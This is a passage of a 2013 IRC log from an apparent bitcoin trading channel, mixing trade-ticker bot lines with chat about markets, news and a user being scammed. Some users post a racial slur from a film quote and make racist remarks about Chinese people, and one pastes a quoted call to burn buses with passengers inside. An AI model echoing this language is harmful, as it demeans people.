15:15:39 [BTCTC] [DMS.MINING] 32 @ 0.018798 = 0.6015 BTC [+] Jul 10 15:15:41 [BTCTC] [DMS.MINING] 2 @ 0.018799 = 0.0376 BTC [+] Jul 10 15:15:42 [BTCTC] [DMS.MINING] 12 @ 0.0188 = 0.2256 BTC [+] Jul 10 15:15:51 ;;estimate Jul 10 15:15:52 Next difficulty estimate | 26008772.5448 based on data since last change | 28702675.7891 based on data for last three days Jul 10 15:15:59 hashspike! Jul 10 15:16:06 ;;nethash Jul 10 15:16:07 205464.891516 Jul 10 15:17:51 But the mining total is only like 0.013 per share ... :/ Jul 10 15:18:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0441 = 0.0882 BTC [+] Jul 10 15:18:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.044101 = 0.2205 BTC [+] Jul 10 15:21:25 que sera sera Jul 10 15:22:28 [BTCTC] [DMS.MINING] 38 @ 0.0188 = 0.7144 BTC [+] Jul 10 15:23:16 http://trilema.com/2013/the-wonder-of-inflation/ Jul 10 15:23:19 The wonder of inflation pe Trilema - Un blog de Mircea Popescu. Jul 10 15:24:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004699 BTC [+] Jul 10 15:27:38 [MPEX] [S.MPOE] 9900 @ 0.00081026 = 8.0216 BTC [-] Jul 10 15:31:56 A good read, as usual. Jul 10 15:32:53 [BTCTC] [TAT.VIRTUALMINE] 350 @ 0.0046 = 1.61 BTC [-] Jul 10 15:43:36 nice article, mp. the USG accountants have invented a myriad of tricks to mis-report inflation. The misreporting ("adjusting the figures"), I first became aware of in 95, and it's only gotten worse since then. Jul 10 15:48:06 ;;nethash Jul 10 15:48:07 I just watch the price of my most important food: the duck magret Jul 10 15:48:07 205181.470713 Jul 10 15:49:32 deadweasel i wasn't really watching in '95, but it started to smell to me sometime in early 2000s Jul 10 15:49:57 by then it was probably an inside joke among us side accountants and whatnot i imagine Jul 10 15:50:06 TomServo ty! Jul 10 15:57:15 [BTCTC] [BITVPS] 175 @ 0.0019 = 0.3325 BTC [-] Jul 10 15:57:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.044101 = 0.2646 BTC [+] Jul 10 15:58:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.044589 = 0.4013 BTC [+] Jul 10 16:00:49 [BTCTC] [TAT.ASICMINER] 9 @ 0.044589 = 0.4013 BTC [+] Jul 10 16:10:25 [BTCTC] [DMS.MINING] 1 @ 0.0189 BTC [+] Jul 10 16:10:36 [BTCTC] [AMC-PT] 2 @ 0.00249 = 0.005 BTC [-] Jul 10 16:11:05 Anyone watch Drunk History last night? Jul 10 16:16:08 [BTCTC] [ASICMINER-PT] 2 @ 4.429999 = 8.86 BTC [-] Jul 10 16:16:36 [BTCTC] [DMS.MINING] 1 @ 0.0189 BTC [+] Jul 10 16:16:58 [BTCTC] [ASICMINER-PT] 2 @ 4.43 = 8.86 BTC [+] Jul 10 16:17:40 [HAVELOCK] [ASICM] 2 @ 0.042999 = 0.086 BTC [-] Jul 10 16:21:08 [BTCTC] [COGNITIVE] 1 @ 0.251001 BTC [-] Jul 10 16:26:10 [HAVELOCK] [ASICM] 90 @ 0.042011 = 3.781 BTC [-] Jul 10 16:26:11 [HAVELOCK] [ASICM] 238 @ 0.0420101 = 9.9984 BTC [-] Jul 10 16:26:13 [HAVELOCK] [ASICM] 41 @ 0.042 = 1.722 BTC [-] Jul 10 16:26:32 [BTCTC] [DMS.MINING] 11 @ 0.0187 = 0.2057 BTC [-] Jul 10 16:26:54 [BTCTC] [TAT.ASICMINER] 22 @ 0.044 = 0.968 BTC [-] Jul 10 16:26:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.043501 = 2.1751 BTC [-] Jul 10 16:26:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.0435 = 0.435 BTC [-] Jul 10 16:26:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.0432 = 0.3024 BTC [-] Jul 10 16:27:00 [BTCTC] [TAT.ASICMINER] 22 @ 0.043102 = 0.9482 BTC [-] Jul 10 16:27:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.0431 = 0.2155 BTC [-] Jul 10 16:27:04 [BTCTC] [TAT.ASICMINER] 35 @ 0.043 = 1.505 BTC [-] Jul 10 16:27:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.04221 BTC [-] Jul 10 16:27:08 [BTCTC] [TAT.ASICMINER] 25 @ 0.04212 = 1.053 BTC [-] Jul 10 16:27:10 [BTCTC] [TAT.ASICMINER] 415 @ 0.04211 = 17.4757 BTC [-] Jul 10 16:27:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.042101 BTC [-] Jul 10 16:27:14 [BTCTC] [TAT.ASICMINER] 47 @ 0.0419 = 1.9693 BTC [-] Jul 10 16:27:47 [BTCTC] [TAT.ASICMINER] 22 @ 0.0419 = 0.9218 BTC [-] Jul 10 16:29:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.041901 = 2.0951 BTC [+] Jul 10 16:29:58 [BTCTC] [DMS.MINING] 100 @ 0.0183 = 1.83 BTC [-] Jul 10 16:31:38 mircea_popescu, i knew it was bad when Clinton talked about Glass-Steagall act.... then it just got worse with the mis-reporting of unemployment and every other official number.. Jul 10 16:31:42 https://en.wikipedia.org/wiki/Glass%E2%80%93Steagall_Act Jul 10 16:34:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.044199 = 0.2652 BTC [+] Jul 10 16:36:16 [BTCTC] [BTC-TRADING-PT] 9 @ 0.9657 = 8.6913 BTC [+] Jul 10 16:37:09 [BTCTC] [DMS.PURCHASE] 41 @ 0.048913 = 2.0054 BTC [+] Jul 10 16:39:22 Please note that this week the ticker symbol for ASICM (on Havelock) will be changed to AM100. This will not affect anything about the asset other than the ticker symbol. Thanks! Jul 10 16:41:50 http://www.aljazeera.com/indepth/features/2013/07/2013710113522489801.html Jul 10 16:41:54 Exclusive: US bankrolled anti-Morsi activists - Features - Al Jazeera English Jul 10 16:42:24 [BTCTC] [S.BBET-PT] 1 @ 0.001826 BTC [-] Jul 10 16:42:24 [BTCTC] [S.BBET-PT] 50 @ 0.001827 = 0.0914 BTC [+] Jul 10 16:42:24 [BTCTC] [S.BBET-PT] 49 @ 0.001829 = 0.0896 BTC [+] Jul 10 16:42:24 [BTCTC] [S.BBET-PT] 145 @ 0.001829 = 0.2652 BTC [+] Jul 10 16:42:24 [BTCTC] [S.BBET-PT] 155 @ 0.001835 = 0.2844 BTC [+] Jul 10 16:42:24 [MPEX] [S.MPOE] 8606 @ 0.00081308 = 6.9974 BTC [+] Jul 10 16:42:34 "Make a road bump with a broken palm tree to stop the buses going into Cairo, and drench the road around it with gas and diesel. When the bus slows down for the bump, set it all ablaze so it will burn down with all the passengers inside … God bless." Jul 10 16:45:19 ThickAsThieves: what. the fuck. Jul 10 16:45:35 as a Christian I find that offensive. Jul 10 16:45:46 to be clear, that's a quote from Morsi Jul 10 16:45:50 not from US Jul 10 16:45:52 oh Jul 10 16:45:52 but... Jul 10 16:46:04 wait Jul 10 16:46:09 then I do believe its time for a war crimes tribunal Jul 10 16:46:24 it's a quote from an ANTI-Morsi Jul 10 16:46:29 whom the US supported Jul 10 16:48:13 Keeping track of who the US supports officially and unofficially can be hard at times Jul 10 16:48:35 oh Jul 10 16:48:42 well, time to try obama for war crimes Jul 10 16:50:18 Apple's guilty for once Jul 10 16:50:19 http://www.reuters.com/article/2013/07/10/us-apple-ebooks-idUSBRE9690GE20130710 Jul 10 16:50:23 Judge says Apple conspired to raise prices on e-books Jul 10 16:50:55 doesn't surprise me Jul 10 16:51:11 who is dumb enough to buy an ebook :/ Jul 10 16:51:24 isnt this one of those things where being guilty means now book publishers and authors get less money? Jul 10 16:52:01 i guess the consumer has to win once in a while Jul 10 16:54:28 ThickAsThieves: What's the reasoning behind the name change to AM100, are you making room for a 1:1 PT, or just clarifying the title? Jul 10 16:54:29 I don't think I'd mind buying an ebook with the author was selling it directly online Jul 10 16:54:52 I like buying ebooks, I find them more convenient and easier to read Jul 10 16:55:27 Of course, I like reading in the dark without distractions, so.. meh Jul 10 16:56:06 https://bitcointalk.org/index.php?topic=253491.0 Jul 10 16:56:12 This Is How You Can Earn Bitcoins From Dice Games Jul 10 16:56:33 parseval: yes, but would you buy an ebook thas is more expensive than a real book? Jul 10 16:57:03 Sometimes I have,, for new releases Jul 10 16:57:55 I mean for the same book of course Jul 10 16:58:04 google is the new microsoft ffs. Jul 10 16:58:06 Yeah, it's worth it for me because I always end up losing any real copies of books I get Jul 10 16:58:11 they made checkout ? apple is massacring them. Jul 10 16:58:25 amazon took over the on-demand server market Jul 10 16:58:46 there's pretty much nothing left. nobody cares about the search and the google ads are the new myspace. Jul 10 16:58:49 fucking ghetto. Jul 10 17:00:15 google is at least throwing a lot against the wall Jul 10 17:00:36 but I have 7 GH/s online still mining away Jul 10 17:00:53 the lowly plebe miner here, checking in. Jul 10 17:02:32 ;;bcstats Jul 10 17:02:34 Current Blocks: 245861 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 90 blocks | Next Difficulty In About: 11 hours, 48 minutes, and 11 seconds | Next Difficulty Estimate: 25978046.7479 | Estimated Percent Change: 21.7607 Jul 10 17:02:42 http://vdisk.weibo.com/s/Jk4aV Jul 10 17:02:50 something about more asicminer blades Jul 10 17:02:59 new blade: 10GH/s=18.88BTC Group buy 18.68BTC Jul 10 17:02:59 mini blade: 5GH/s=9.88BTC Group buy 9.68BTC Jul 10 17:03:30 yep Jul 10 17:03:47 interesting how AM is ignoring english-speaking people lately Jul 10 17:04:12 rather, prioritizing the Chinese Jul 10 17:04:53 because the chinese market is growing at an insane pace from what i hear Jul 10 17:05:04 especially on the engineering and production side Jul 10 17:05:23 all the shit the masses of chinese are good at Jul 10 17:06:17 so 5btc asicminer again in say 72 hours? Jul 10 17:06:25 maybe less Jul 10 17:08:41 ThickAsThieves you know where you read that first :D Jul 10 17:08:54 yep ;) Jul 10 17:09:05 kinda funny, various venture capitalists know bettar. Jul 10 17:09:14 i should prolly be hai fred w. Jul 10 17:09:20 i even have a QQ account now Jul 10 17:09:27 crymoar ? Jul 10 17:09:36 Tencent's chat app Jul 10 17:09:43 i have the impression, we are left alone. those chinese resellers are the interface to am in the future, hm? Jul 10 17:09:54 and everyone sells on this shady website Jul 10 17:10:02 shady to you maybe Jul 10 17:10:05 yes Jul 10 17:10:10 i'm very biased Jul 10 17:10:15 to quote american history x, Jul 10 17:10:17 after looking at it xD Jul 10 17:10:20 in the new world you're the nigger. Jul 10 17:10:28 yeah well Jul 10 17:10:31 it would be fine Jul 10 17:10:33 great movie Jul 10 17:11:03 curb stomp bish Jul 10 17:11:09 cringe Jul 10 17:11:12 but right now it doesn't feel like quality.. i mean.. come on. did you see those "razor blades"? xD Jul 10 17:11:14 ikr Jul 10 17:12:17 chinese stuff never starts by looking like quality. Jul 10 17:12:21 remember the 90s reobek ? Jul 10 17:12:48 What shady site Jul 10 17:13:47 http://ttbit.taobao.com Jul 10 17:14:21 http://item.taobao.com/item.htm?spm=a1z10.1.w4023-1788523827.7.uuOJVa&id=18500846731 Jul 10 17:15:20 http://img.taobaocdn.com/imgextra/http://img02.taobaocdn.com/imgextra/i2/58510024/T2VGAwXoxXXXXXXXXX_!!58510024.jpg what is this.. >_>" Jul 10 17:15:31 ah i see Jul 10 17:15:45 though i was very happy to see there are already big sales going on Jul 10 17:15:52 it's a bitcoin tractor Jul 10 17:15:56 pretty ballin Jul 10 17:15:57 yes lol Jul 10 17:16:12 and this is friedcat: http://img01.taobaocdn.com/bao/uploaded/i3/17479036823220330/T1XD8kFnVgXXXXXXXX_!!0-item_pic.jpg_240x240.jpg Jul 10 17:19:00 the tractor is what happens when chinese people try to be original instead of copy other people's art Jul 10 17:19:28 (hopefully that isn't too racist...) Jul 10 17:20:19 bulldozer woud be funnier Jul 10 17:22:04 omg that was so racist Jul 10 17:22:14 my dog was chinese! DO TYOU HAVE ANY IDEA HOW THIS MAKES ME FEEL Jul 10 17:22:40 as a christian, i find that your dog is chinese offensive Jul 10 17:23:13 what's christian ass ? Jul 10 17:25:02 holier than thou? Jul 10 17:25:46 lol Jul 10 17:26:29 but incidentally, let us contemplate how should it be in the future the case am goes bust majorly, TONS of idiots will be all "o how could you give all that btc to some random internet guy you've not even seen the picture of clearly this was a wrong thing to do" Jul 10 17:26:46 nevertheless, at the present time these future strategists are nowhere in sight. Jul 10 17:26:55 this always happens somehow. Jul 10 17:27:21 what really could be done Jul 10 17:27:31 other than not investing Jul 10 17:28:43 yeah Jul 10 17:28:52 damn, i cracked it Jul 10 17:29:03 that's the point. when you don't know how the chips will fall you don't know, and when you already know the discussion is pointless. Jul 10 17:31:35 but this the case for all btc assets Jul 10 17:31:38 even yours Jul 10 17:32:14 just because you have a big face on your blog, and gpg-signed contracts doesnt actually stop anything bad from happening Jul 10 17:33:34 yeah what ThickAsThieves said Jul 10 17:33:38 an what I said over a year ago Jul 10 17:40:03 lol that face..anyone else has impression mircea is going to extinguish the cigar on you? Jul 10 17:40:22 ThickAsThieves well of course it's the case for everything Jul 10 17:40:28 that's kindma the point Jul 10 17:40:31 jurov ehehe Jul 10 17:41:04 [BTCTC] [DMS.PURCHASE] 9 @ 0.048913 = 0.4402 BTC [+] Jul 10 17:43:18 mircea_popescu: what is an upir? Jul 10 17:43:19 [BTCTC] [LTC-ATF.B2] 200 @ 0.01 = 2 BTC Jul 10 17:44:24 [10:40] that's kindma the point <<< so the point is there is no point? Jul 10 17:47:00 thestrin1puller no idea ? Jul 10 17:47:10 i guess the point is invest or perish? Jul 10 17:47:11 ThickAsThieves well no, the point is that all the hindsight expertise is dumb. Jul 10 17:47:46 mircea_popescu: Isn't it a romani word? Jul 10 17:47:46 thestrin1puller: in slovak upir is a vampyre.. but ofc it needs context Jul 10 17:47:56 thank you jurov ! Jul 10 17:47:57 lol Jul 10 17:48:08 [10:47] i guess the point is invest or perish? << no, invest AND perish Jul 10 17:48:15 it's from a show about these romanians who move into a twin peaks-like town Jul 10 17:48:19 i stand corrected Jul 10 17:48:25 maybe I'll make that slogan that TAT slogan, Jul 10 17:48:30 Risk is a Luxury Jul 10 17:48:32 or Jul 10 17:48:37 Wealth is a Luxury Jul 10 17:48:42 in romanian it's vampir. Jul 10 17:49:17 yes, next to it will be coinbr mermaid with "navigating btc investment safely" Jul 10 17:52:23 Luxury is luxury? Jul 10 17:52:48 :) Jul 10 17:52:56 [BTCTC] [BFMINES] 368 @ 0.004 = 1.472 BTC [+] Jul 10 17:55:59 [BTCTC] [ASICMINER-PT] 1 @ 4.399 BTC [+] Jul 10 17:56:58 [BTCTC] [ASICMINER-PT] 1 @ 4.350001 BTC [-] Jul 10 17:57:00 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 10 17:57:02 [BTCTC] [ASICMINER-PT] 3 @ 4.35 = 13.05 BTC [-] Jul 10 17:57:03 [BTCTC] [ASICMINER-PT] 1 @ 4.340006 BTC [-] Jul 10 17:57:05 [BTCTC] [ASICMINER-PT] 1 @ 4.340005 BTC [-] Jul 10 17:57:08 [BTCTC] [ASICMINER-PT] 1 @ 4.340001 BTC [-] Jul 10 17:57:10 [BTCTC] [ASICMINER-PT] 2 @ 4.34 = 8.68 BTC [-] Jul 10 17:57:12 [BTCTC] [ASICMINER-PT] 2 @ 4.331012 = 8.662 BTC [-] Jul 10 17:57:23 [BTCTC] [LTC-ATF.B2] 1353 @ 0.01 = 13.53 BTC Jul 10 17:58:21 [BTCTC] [AMC-PT] 25 @ 0.00249 = 0.0623 BTC [-] Jul 10 18:10:19 [BTCTC] [S.MPOE-PT] 100 @ 0.000897 = 0.0897 BTC [-] Jul 10 18:10:31 [BTCTC] [ASICMINER-PT] 1 @ 4.379999 BTC [+] Jul 10 18:10:33 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 10 18:10:35 [BTCTC] [ASICMINER-PT] 2 @ 4.396999 = 8.794 BTC [+] Jul 10 18:10:36 [BTCTC] [ASICMINER-PT] 4 @ 4.397 = 17.588 BTC [+] Jul 10 18:11:00 [BTCTC] [TAT.ASICMINER] 11 @ 0.042661 = 0.4693 BTC [-] Jul 10 18:11:08 [BTCTC] [S.MPOE-PT] 4 @ 0.000896 = 0.0036 BTC [-] Jul 10 18:11:10 [BTCTC] [S.MPOE-PT] 200 @ 0.000896 = 0.1792 BTC [-] Jul 10 18:11:51 [BTCTC] [S.MPOE-PT] 9 @ 0.000895 = 0.0081 BTC [-] Jul 10 18:11:54 [BTCTC] [S.MPOE-PT] 11 @ 0.000895 = 0.0098 BTC [-] Jul 10 18:11:56 [BTCTC] [S.MPOE-PT] 1 @ 0.000895 BTC [-] Jul 10 18:11:57 [BTCTC] [S.MPOE-PT] 200 @ 0.000895 = 0.179 BTC [-] Jul 10 18:14:30 [BTCTC] [BASIC-MINING] 3 @ 0.253 = 0.759 BTC [-] Jul 10 18:15:02 [BTCTC] [BASIC-MINING] 10 @ 0.252001 = 2.52 BTC [-] Jul 10 18:15:32 [BTCTC] [BASIC-MINING] 17 @ 0.252 = 4.284 BTC [-] Jul 10 18:15:43 [BTCTC] [S.MPOE-PT] 10 @ 0.000885 = 0.0089 BTC [-] Jul 10 18:16:01 [BTCTC] [BASIC-MINING] 1 @ 0.251 BTC [-] Jul 10 18:16:01 [BTCTC] [BASIC-MINING] 10 @ 0.251 = 2.51 BTC [-] Jul 10 18:16:31 [BTCTC] [S.MPOE-PT] 10 @ 0.00087 = 0.0087 BTC [-] Jul 10 18:16:40 [BTCTC] [BASIC-MINING] 5 @ 0.25005 = 1.2503 BTC [-] Jul 10 18:16:55 [BTCTC] [S.MPOE-PT] 10 @ 0.000865 = 0.0087 BTC [-] Jul 10 18:17:14 [BTCTC] [BASIC-MINING] 2 @ 0.25 = 0.5 BTC [-] Jul 10 18:17:15 [BTCTC] [BASIC-MINING] 3 @ 0.25 = 0.75 BTC [-] Jul 10 18:17:16 [BTCTC] [BASIC-MINING] 5 @ 0.25 = 1.25 BTC [-] Jul 10 18:17:17 [BTCTC] [BASIC-MINING] 3 @ 0.25 = 0.75 BTC [-] Jul 10 18:17:26 [BTCTC] [S.MPOE-PT] 50 @ 0.000863 = 0.0432 BTC [-] Jul 10 18:18:00 [BTCTC] [S.MPOE-PT] 10 @ 0.00086 = 0.0086 BTC [-] Jul 10 18:18:31 [BTCTC] [S.MPOE-PT] 50 @ 0.000841 = 0.0421 BTC [-] Jul 10 18:18:49 [BTCTC] [S.MPOE-PT] 20 @ 0.00084 = 0.0168 BTC [-] Jul 10 18:18:51 [BTCTC] [S.MPOE-PT] 10 @ 0.00084 = 0.0084 BTC [-] Jul 10 18:18:56 [HAVELOCK] [ASICM] 3 @ 0.0434 = 0.1302 BTC [+] Jul 10 18:18:57 [BTCTC] [BASIC-MINING] 8 @ 0.271999 = 2.176 BTC [+] Jul 10 18:19:28 [BTCTC] [S.MPOE-PT] 200 @ 0.000811 = 0.1622 BTC [-] Jul 10 18:20:26 [BTCTC] [S.MPOE-PT] 554 @ 0.00081 = 0.4487 BTC [-] Jul 10 18:22:05 [MPEX] [S.MPOE] 1500 @ 0.00081156 = 1.2173 BTC [-] Jul 10 18:22:18 [BTCTC] [BASIC-MINING] 3 @ 0.243 = 0.729 BTC [-] Jul 10 18:22:52 [BTCTC] [BASIC-MINING] 10 @ 0.241008 = 2.4101 BTC [-] Jul 10 18:22:52 lol last post https://bitcointalk.org/index.php?topic=133147.msg2697166#msg2697166 Jul 10 18:23:29 [BTCTC] [BASIC-MINING] 15 @ 0.241007 = 3.6151 BTC [-] Jul 10 18:24:21 [BTCTC] [BASIC-MINING] 22 @ 0.241001 = 5.302 BTC [-] Jul 10 18:24:32 [BTCTC] [AMC-PT] 473 @ 0.00249 = 1.1778 BTC [-] Jul 10 18:24:32 [BTCTC] [BASIC-MINING] 3 @ 0.27 = 0.81 BTC [+] Jul 10 18:24:33 [BTCTC] [AMC-PT] 60 @ 0.00249 = 0.1494 BTC [-] Jul 10 18:24:34 [BTCTC] [BASIC-MINING] 3 @ 0.271 = 0.813 BTC [+] Jul 10 18:24:35 [BTCTC] [AMC-PT] 300 @ 0.002495 = 0.7485 BTC [+] Jul 10 18:24:36 [BTCTC] [BASIC-MINING] 2 @ 0.271999 = 0.544 BTC [+] Jul 10 18:24:37 [BTCTC] [AMC-PT] 1500 @ 0.002499 = 3.7485 BTC [+] Jul 10 18:24:38 [BTCTC] [BASIC-MINING] 2 @ 0.279998 = 0.56 BTC [+] Jul 10 18:24:39 [BTCTC] [AMC-PT] 2000 @ 0.002499 = 4.998 BTC [+] Jul 10 18:24:40 [BTCTC] [AMC-PT] 667 @ 0.002499 = 1.6668 BTC [+] Jul 10 18:25:19 [BTCTC] [AMC-PT] 134 @ 0.002499 = 0.3349 BTC [+] Jul 10 18:26:13 [BTCTC] [LTC-ATF.B2] 5 @ 0.01399 = 0.07 BTC [+] Jul 10 18:26:46 [BTCTC] [AMC-PT] 2 @ 0.0023 = 0.0046 BTC [-] Jul 10 18:26:47 [BTCTC] [AMC-PT] 25 @ 0.0023 = 0.0575 BTC [-] Jul 10 18:26:49 [BTCTC] [AMC-PT] 37 @ 0.0023 = 0.0851 BTC [-] Jul 10 18:30:18 [BTCTC] [LTC-ATF.B2] 50 @ 0.01399 = 0.6995 BTC [+] Jul 10 18:30:53 [BTCTC] [LTC-ATF.B2] 15 @ 0.01399 = 0.2099 BTC [+] Jul 10 18:35:17 [BTCTC] [S.BBET-PT] 3 @ 0.001835 = 0.0055 BTC [+] Jul 10 18:35:18 [BTCTC] [S.BBET-PT] 2 @ 0.00184 = 0.0037 BTC [+] Jul 10 18:35:19 [BTCTC] [S.BBET-PT] 59 @ 0.00189 = 0.1115 BTC [+] Jul 10 18:35:21 [BTCTC] [S.BBET-PT] 50 @ 0.00197 = 0.0985 BTC [+] Jul 10 18:35:26 Jup just got scammed. Yay. Jul 10 18:35:46 [BTCTC] [ASICMINER-PT] 1 @ 4.4201 BTC [+] Jul 10 18:39:31 [BTCTC] [LTC-ATF.B2] 25 @ 0.01399 = 0.3498 BTC [+] Jul 10 18:44:19 scammed? Jul 10 18:44:50 yeah Jul 10 18:45:02 how so Jul 10 18:45:26 https://bitcointalk.org/index.php?topic=253466.0 Jul 10 18:45:31 Bought 5 AM Shares from Diamondstarfall Jul 10 18:45:50 I was retarded, too much good faith in people. Always get punished for that. Jul 10 18:48:04 [BTCTC] [ASICMINER-PT] 1 @ 4.43 BTC [+] Jul 10 18:48:07 Ah just read through it, sucks man sorry to hear that. Jul 10 18:48:12 A pretty penny indeed Jul 10 18:49:17 The most frustrating part isn't even the BTC, it's the "how big of a douchebag can you be" part Jul 10 18:49:45 [HAVELOCK] [ASICM] 45 @ 0.0422 = 1.899 BTC [-] Jul 10 18:49:52 ;( Jul 10 18:50:03 damn San1ty Jul 10 18:50:11 [HAVELOCK] [ASICM] 57 @ 0.042988 = 2.4503 BTC [+] Jul 10 18:50:17 i just read the Lemon default thread, seems you're not lucky Jul 10 18:51:02 [BTCTC] [S.MPOE-PT] 5 @ 0.000793 = 0.004 BTC [-] Jul 10 18:51:03 Yup Jul 10 18:51:06 Some got tens of thousands stolen. Jul 10 18:51:25 Got scammed for 31 BTC in total now. Jul 10 18:51:25 My biggest lost was 769 BTC =/ Jul 10 18:51:32 I'm just so frustrated with myself... Jul 10 18:51:34 loss* Jul 10 18:51:59 wait which lemon ? Jul 10 18:52:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 10 18:52:18 Everyone always says use Escrow because apperently everyone is scum of the earth at bitcointalk. It's a sad moment when you realize it's true... Jul 10 18:52:31 doh. Jul 10 18:52:43 well... the entire share transfer thing am uses is pretty insane anyway. Jul 10 18:52:49 so it sort-of breeds the shit. Jul 10 18:53:09 mjr_: Yeah... Jul 10 18:53:15 The issue is simple: irreversible payment (aka It's not Paypal), anonymous if done correctly. Jul 10 18:53:24 [BTCTC] [ASICMINER-PT] 1 @ 4.43 BTC [+] Jul 10 18:53:26 I just hate to be that pain in the ass guy that demands confirmations, escrow, more confirmations... Jul 10 18:53:44 You basically have something the scammed can't reverse and can't be found. Jul 10 18:54:07 Of course the forum is one of the easy target around the web for scammers. Jul 10 18:54:07 Worst part is I already lost 10 BTC with the Lemon scam story. Jul 10 18:54:44 wait which lemon ? // https://bitcointalk.org/index.php?topic=237537.0 Jul 10 18:55:17 Apocaly: Yes that Lemon, He stole 10 BTC from me with his "Crypto.PM Investment Scheme" Jul 10 18:55:31 [HAVELOCK] [VTX] 4 @ 0.810001 = 3.24 BTC [-] Jul 10 18:56:13 Yeah, You just need to start with the attitude, everyone is scum that is out to get me. Jul 10 18:56:23 That way you'll never get scammed. Jul 10 18:56:38 San1ty, I do AM escrow for .5btc or .5%, whichever is greater. Small price to pay. Jul 10 18:57:01 [HAVELOCK] [HIM] 7 @ 0.289001 = 2.023 BTC [-] Jul 10 18:57:02 [HAVELOCK] [HIM] 3 @ 0.289 = 0.867 BTC [-] Jul 10 18:57:14 [BTCTC] [TAT.ASICMINER] 50 @ 0.043489 = 2.1745 BTC [+] Jul 10 18:57:18 If you don't trust anyone, you don't get to trade tho. Jul 10 18:57:22 ThickAsThieves: Ain't helping me now isn't it. But yes I should do it in the future... Jul 10 18:57:31 It gets easier to spot scams with time. Jul 10 18:57:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.04379 BTC [+] Jul 10 18:58:29 [BTCTC] [S.DICE-PT] 3 @ 0.00235 = 0.0071 BTC [-] Jul 10 18:58:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.04379 BTC [+] Jul 10 18:59:22 mp has a great scammer article Jul 10 18:59:25 [MPEX] [S.MPOE] 6150 @ 0.00081156 = 4.9911 BTC [-] Jul 10 18:59:38 explaining how time is the one thing scammers can't control Jul 10 18:59:49 If someone needs the funds quickly, never a good sign... Jul 10 18:59:59 yeah ok. Jul 10 19:00:04 Yup Jul 10 19:00:26 [BTCTC] [S.DICE-PT] 97 @ 0.00235 = 0.228 BTC [-] Jul 10 19:00:28 [BTCTC] [S.DICE-PT] 200 @ 0.002203 = 0.4406 BTC [-] Jul 10 19:00:29 [HAVELOCK] [SDICE] 7 @ 0.19999899 = 1.4 BTC [+] Jul 10 19:00:30 [BTCTC] [S.DICE-PT] 100 @ 0.002203 = 0.2203 BTC [-] Jul 10 19:00:32 [BTCTC] [S.DICE-PT] 300 @ 0.002202 = 0.6606 BTC [-] Jul 10 19:00:40 [BTCTC] [ASICMINER-PT] 1 @ 4.444444 BTC [+] Jul 10 19:01:06 [BTCTC] [AMC-PT] 199 @ 0.002499 = 0.4973 BTC [+] Jul 10 19:01:11 Stupid, stupid me. Jul 10 19:01:39 http://trilema.com/2013/vultures-vultures-everywhere/ Jul 10 19:01:41 Vultures, vultures everywhere! pe Trilema - Un blog de Mircea Popescu. Jul 10 19:01:43 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0046 = 0.0184 BTC [-] Jul 10 19:02:25 Sometimes they actually have the thing, and can prove it, but are in a hurry. Usually it's be able to sell the same thing multiple times to different people. They need the funds quick before any party realize what happened. Jul 10 19:03:11 [BTCTC] [ASICMINER-PT] 1 @ 4.444444 BTC [+] Jul 10 19:03:15 [BTCTC] [ASICMINER-PT] 1 @ 4.444999 BTC [+] Jul 10 19:03:17 Yeah actually this guy kind of was in a hurry Jul 10 19:03:25 should have rang an alarm bell in my head. Jul 10 19:03:48 769 btcs, That's a ton... hope that was before the spike in Jan. Less hurt Jul 10 19:03:54 [BTCTC] [ASICMINER-PT] 1 @ 4.444999 BTC [+] Jul 10 19:04:33 most definitely Jul 10 19:04:41 And when I track where my 21 BTC went it looks like it went to some fucking dice game... Jul 10 19:04:52 usually with the smalltimers. Jul 10 19:05:06 some camwhore working just-dice chat kept losing it all there Jul 10 19:05:18 she thought she;'s really clever by always begging with a new address, but then there's chatlogs. Jul 10 19:05:37 meanwhile back at the ranch : Jul 10 19:05:38 Hello, is this the Sheriff's Office?" Jul 10 19:05:38 "Yes. What can I do for you?" Jul 10 19:05:38 "I'm calling to report 'bout my neighbor Virgil Smith....He's hidin' marijuana inside his firewood! Don't quite know how he gets it inside them logs, but he's hidin' it there." Jul 10 19:05:38 "Thank you very much for the call, sir." Jul 10 19:05:38 The next day, the Sheriff's Deputies descend on Virgil's house. They search the shed where the firewood is kept. Jul 10 19:05:38 Using axes, they bust open every piece of wood, but find no marijuana. They sneer at Virgil and leave. Jul 10 19:05:38 Shortly, the phone rings at Virgil's house. Jul 10 19:05:38 "Hey, Virgil! This here's Floyd....Did the Sheriff come?" Jul 10 19:05:38 "Yeah!" Jul 10 19:05:38 "Did they chop all your firewood?" Jul 10 19:05:38 "Yep!" Jul 10 19:05:38 "Happy Birthday, buddy!" Jul 10 19:06:04 That was last fall. Guy owed, never paid back the loan extended to him. Jul 10 19:06:14 [BTCTC] [ASICMINER-PT] 3 @ 4.445086 = 13.3353 BTC [+] Jul 10 19:06:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.043749 BTC [-] Jul 10 19:06:36 So price was lower. It's not such a consolation considering I kept all my BTC and sold what I had available at 250. Jul 10 19:06:48 [BTCTC] [ASICMINER-PT] 2 @ 4.445087 = 8.8902 BTC [+] Jul 10 19:06:48 some you wion some you lose Namworld Jul 10 19:06:50 Could have made a really nice sale at 250 with those BTCs Jul 10 19:06:56 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0047 = 0.0094 BTC [+] Jul 10 19:07:11 i could list all the "i could have"'s all the way to billions you know. Jul 10 19:07:13 Yeah no doubt just did the math at its peak Jul 10 19:07:16 actually it was 